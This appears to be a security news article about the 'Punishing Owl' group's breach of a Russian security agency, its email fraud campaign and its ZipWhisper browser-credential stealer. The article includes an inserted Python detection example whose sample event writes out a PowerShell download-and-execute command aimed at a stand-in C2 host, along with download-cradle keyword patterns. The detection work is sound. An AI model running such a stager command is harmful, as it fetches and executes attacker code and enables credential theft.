A new and sophisticated hacker group, operating under the moniker “Punishing Owl,” has emerged, launching targeted cyberattacks against Russian government security agencies. The group announced its presence on December 12, 2025, claiming responsibility for a successful network breach of a prominent Russian government security entity.
Punishing Owl demonstrated its intent to maximize public exposure by publishing stolen internal documents on a data leak site and mirroring the files on a Mega.nz repository. The group employed a multi-faceted approach to amplify the impact of its operation, including DNS manipulation and strategic timing of its announcement to hinder response efforts.
Following the initial breach, Punishing Owl escalated its campaign by initiating business email compromise (BEC) attacks against the breached agency’s partners and contractors. Analysis by Habr security researchers indicated that these malicious emails were dispatched from a Brazilian server, utilizing email addresses designed to mimic the compromised victim’s domain. These messages falsely confirmed the network intrusion and urged recipients to urgently review attached documents, likely containing further malicious payloads.
The infrastructure utilized by Punishing Owl reveals a notable degree of technical sophistication, despite the group’s recent emergence. Security analysts have identified the configuration of fake TLS certificates, the establishment of IMAP and SMTP services for their email operations, and the deployment of a PowerShell-based information stealer known as ZipWhisper. This stealer is designed to harvest browser credentials from infected systems.
Infection Mechanism and Credential Theft by Punishing Owl
The ZipWhisper stealer employs a multi-stage infection process designed to extract sensitive web browser data from compromised hosts. When a victim opens a disguised LNK file, it silently executes PowerShell commands. These commands are responsible for downloading the stealer payload from the attacker’s command-and-control (C2) infrastructure.
Once active, the malware proceeds to locate and collect files containing user credentials, session cookies, and saved passwords from various web browsers. This gathered information is then compressed into password-protected ZIP archives, which are given specific naming conventions that often include the username and chunk numbers, aiding the attackers in organizing stolen data.
These temporary archives are stored within the victim’s AppData/Local/Temp directory. Subsequently, the stealer uploads these archives to the attacker’s C2 server through a custom endpoint structure. This method of data exfiltration is designed to be stealthy, blending in with normal network traffic.
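The two observable stages described above (explorer-spawned PowerShell with a download cradle, followed by chunked ZIP archives appearing under the user's AppData\Local\Temp) can be correlated per host from endpoint telemetry. The following is an added detection example, not code from the article or from the ZipWhisper analysis; the Sysmon-style event shape, the download-cradle keywords and the "username followed by a chunk number" filename pattern are assumptions, since the page does not publish ZipWhisper's exact naming convention or command lines.

```python
import re
from collections import defaultdict

# Constructed sample events in a Sysmon-like shape (hypothetical; not from the page or any real capture).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "event": "ProcessCreate", "user": "alice", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s2')"},
    {"host": "ws01", "event": "FileCreate", "user": "alice", "path": r"C:\Users\alice\AppData\Local\Temp\alice_1.zip"},
    {"host": "ws01", "event": "FileCreate", "user": "alice", "path": r"C:\Users\alice\AppData\Local\Temp\alice_2.zip"},
    {"host": "ws02", "event": "ProcessCreate", "user": "bob", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
    {"host": "ws02", "event": "FileCreate", "user": "bob", "path": r"C:\Users\bob\Downloads\report.zip"},
]

# Download-cradle indicators typical of PowerShell stagers (assumed patterns, not quoted from the page).
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+$", re.I)

def is_download_cradle(ev):
    """PowerShell spawned by explorer.exe (as a double-clicked LNK does) with a download cmdlet in its command line."""
    return (ev["event"] == "ProcessCreate"
            and ev["image"].lower().endswith("powershell.exe")
            and ev["parent"].lower().endswith(r"\explorer.exe")
            and bool(DOWNLOAD_RE.search(ev["cmdline"])))

def is_staged_archive(ev):
    """ZIP written under AppData\\Local\\Temp whose name carries the username plus a chunk number.
    The exact ZipWhisper naming is not published; '<user>' followed by digits is an assumption."""
    if ev["event"] != "FileCreate" or not TEMP_RE.search(ev["path"]):
        return False
    name = ev["path"].rsplit("\\", 1)[-1]
    return re.match(rf"^{re.escape(ev['user'])}\D*\d+\.zip$", name, re.I) is not None

def score_hosts(events):
    """Map host -> reasons, keeping only hosts where BOTH stages appear; either alone is routine noise."""
    hits = defaultdict(list)
    for ev in events:
        if is_download_cradle(ev):
            hits[ev["host"]].append("download cradle: " + ev["cmdline"][:60])
        elif is_staged_archive(ev):
            hits[ev["host"]].append("staged archive: " + ev["path"])
    return {h: r for h, r in hits.items()
            if any(x.startswith("download") for x in r) and any(x.startswith("staged") for x in r)}
```

On the constructed sample, only ws01 is reported (one cradle plus two staged archives); ws02's scripted PowerShell run and ordinary Downloads ZIP are ignored, which is the point of requiring both stages before alerting.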
Further analysis of the stealer’s code has revealed comments that suggest the potential use of artificial intelligence (AI) tools in generating parts of the malicious script. This points to Punishing Owl potentially leveraging modern development techniques to accelerate and enhance their operational capabilities, particularly in their focus on Russian critical infrastructure targets.
The group also strategically timed its initial breach announcement for Friday evening at 6:37 PM. This timing was deliberate, calculated to delay incident response efforts and ensure maximum public visibility of their cyberattack. The manifesto accompanying the stolen documents provides insight into their motivations, although the specific details of their political grievances have not been fully disclosed.
The technical sophistication evident in Punishing Owl’s methods, including DNS redirection to a Brazilian server that hosts both the stolen data and the group’s manifesto, coupled with the deployment of tools like ZipWhisper, indicates a well-resourced and determined adversary. The continued targeting of Russian government security networks suggests a potential for sustained and evolving cyber campaigns from this new threat actor.
Moving forward, cybersecurity experts will be closely monitoring for any further activity from Punishing Owl, including potential follow-on attacks or expansions of their targeting. The group’s utilization of what appears to be AI-assisted scripting is a notable development worthy of continued investigation, as it could signal a new trend in the capabilities of emerging hacker collectives.